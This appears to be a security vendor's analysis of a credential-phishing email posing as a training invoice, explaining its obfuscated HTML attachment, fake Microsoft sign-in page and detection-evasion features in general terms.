Credential Phishing Attack Masquerades as an Employee Training Invoice

In this attack, a company executive received an email indicating it included an invoice for training. The email was configured to hide the sender’s email address and the sending display name was set to “I N VOICE-176152,” which included hidden encoded characters. An analysis of the email headers indicated that the email was sent using a compromised external domain.

Attached to the email was an HTML file matching the invoice name referenced in the email subject. The source code of the HTML attachment was obfuscated with a Javascript unescape function. Had the recipient opened the file, a new browser window would have appeared that initially indicated they were being directed “to your organization’s sign-in page.” After a few seconds, the page would have reloaded to display a fake Microsoft login page pre-filled with the recipient’s email address.

This attack contained hidden encoded characters, which prevents threat detection tools relying on identifying known malicious text strings from identifying the email as a threat. Because the sender’s email address was hidden, it wouldn’t have been able to compare it to known malicious accounts. Because the files associated with this attack contained source code that had been obfuscated, a basic scan of the file to identify malicious artifacts, such as URLs, could not be performed.

HTML attachments are commonly used to deliver phishing payloads without having to include the malicious content in the email itself. The use of obfuscated source code is a common tactic in phishing attacks. Additionally, an in-depth analysis of files, rather than simply scanning raw source code, could result in the identification of malicious artifacts. The absence of a sending email address is indicative of behavior from a malicious source. A holistic detection system that is able to extract and analyze URLs from email attachments is required to assess the intent of any links, alongside other signals acquired through content analysis, to determine whether the email is malicious.

If an employee entered credentials into the phishing page, attackers would have full access to their email account, which they can then use to look for sensitive information or as a launch point for other attacks on the employee’s coworkers, customers, or vendors.